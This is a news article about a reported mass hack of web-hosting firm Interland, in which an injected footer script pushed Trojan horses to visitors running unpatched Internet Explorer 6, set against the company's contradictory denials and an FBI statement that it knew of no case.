Security Holes Vex Web Host Firm

Share

Security Holes Vex Web Host Firm

Interland, the world's second-largest Web-hosting company, appears to have suffered an ongoing mass hack attack that has compromised some 1,100 websites, according to a security professional who has analyzed the script.

Marc Maiffret, a co-founder of eEye Digital Security, said the sites have been infected with a malicious script that continues to reinfect them after they are cleaned. The hack has also placed visitors to the compromised sites at risk of being infected by malicious code, he said.

But Interland denies that a hack has occurred, saying only that a few sites have gone offline.

According to Maiffret, Web surfers who have visited the compromised sites might get a surprise on their next phone bill when they discover expensive calls made to 900 numbers. Others could also find themselves party to a denial-of-service attack launched against another computer.

That's because the malicious script placed in the HTML code at the bottom of many Interland-hosted Web pages instructs visitors' browsers to access other malicious sites and download either of two Trojan Horses, which can have different effects on a user's machine. The malicious script affects only surfers using unpatched versions of the Internet Explorer 6 browser.

Max Riseman, owner of WeatherMaine, a site providing weather news in Maine that is hosted by Interland, said he first found the malicious script on his website last Thursday.

After complaining to Interland, the company removed the code from Riseman's site on Thursday, but it reappeared on Friday, he said. Interland removed it again on Saturday, only to have it appear again on Tuesday and Wednesday.

In a note to Riseman, an Interland tech-support rep wrote that someone had used a "previously unknown exploit" to gain access to one of Interland's servers and that the company was "working in conjunction with Microsoft to correct the issue permanently."

A second tech-support person told Riseman in an e-mail that engineers were patching the server, implying that a hacker placed code on the Interland server, which then automatically inserts the malicious script into HTML pages hosted on the server.

"Due to the severity of this issue, we are directing all available external and internal resources to minimize the impact to our customers and to prevent future reoccurrences," a tech rep wrote.

Interland has offered conflicting responses when asked about the problem. In a pop-up message that appears on the company's tech-support page after customers log in, Interland writes that "engineers and security experts are working with external experts" to address "the root causes of these issues." The note also says that the problems have been caused by "malicious activity" and that Interland "is in contact with the appropriate law enforcement agencies regarding this situation."

But in an interview, other than admitting that certain of their customers' websites have experienced "service and availability" issues, the company denied that any server has been hacked or that its server software has any vulnerability that could be exploited in such a way. Initially, Interland also denied that a malicious script was found on customers' websites.

Interland's Jeff Reich, director of information security and controls, said there was a short period when the websites for some customers were unavailable, but "it wasn't a matter of the server going down or any data compromise or anything like that," he said. "Beyond that, I don't think there's actually ... anything that I would call a hack attack."

Interland hosts more than 250,000 websites. Its customers include small and medium-size businesses, among them e-commerce sites. The company is considered the largest Windows 2000-based hosting firm. One of the company's key partners and investors is Microsoft. The company also uses Microsoft servers, among those of other vendors.

But despite the note from a tech rep stating that the problem was a hacked server, Reich said, "There is no inherent vulnerability or vendor issue associated with what we're experiencing right now."

According to Maiffret, the script is embedded in HTML code in the footer of Web pages (the footer is the area at the bottom of a Web page where a business generally includes copyright info and its privacy policy). The script exploits a vulnerability in Internet Explorer 6 that was reported in December 2001. Only users who have not patched IE6 are vulnerable.

As the infected Web page loads in a browser, the script causes the user's computer to contact one of four IP addresses connected to pages that contain Trojan Horses that are then automatically downloaded to the user's computer. This all occurs without the user being aware that anything is happening.

AICORE is one of the Trojan Horses. This program gives a hacker remote access to the infected computer and also turns it into a zombie for use in a future denial-of-service attack. The other Trojan Horse, ap26.exe, contains an automatic dialing program that causes a user's computer modem to dial numbers (such as 900 numbers owned by pornographers that result in charges to a user's phone bill).

Maiffret says he found 1,100 of Interland's sites to be infected with the script when he searched for a text string contained in the script on Google. Maiffret spoke with an Interland employee on the phone who told him the company knew about the mass hack and that the FBI had been contacted. He also said Interland told him it was working with the FBI to take down the websites that were hosting the Trojan Horse code.

But Reich said, "We have not called the FBI for anything associated with this ... nor did we ask for the FBI to be involved in what's going on here."

Joe Parris, special agent with the FBI in Atlanta, said no one had contacted the agency's cybercrime division about a problem at Interland and he knew of no case related to it.

Microsoft did not respond to a request for comment.

Interland quietly dealt with a similar problem back in May when a hacker inserted the same malicious script on a site called LabMice.net, which directed users to an IP address for the site where a Trojan Horse was posted. Interland removed the script, but it reappeared on July 28. Interland apparently applied a fix, only to have the mass hack attack begin exactly a month later on Aug. 28.

Interland says it has fixed all problems with customers' sites going offline and says it is working to make sure the problem doesn't return.

In the meantime, in an online discussion forum (registration required) for webmasters, Interland customers continue to report problems with the malicious script appearing on their websites.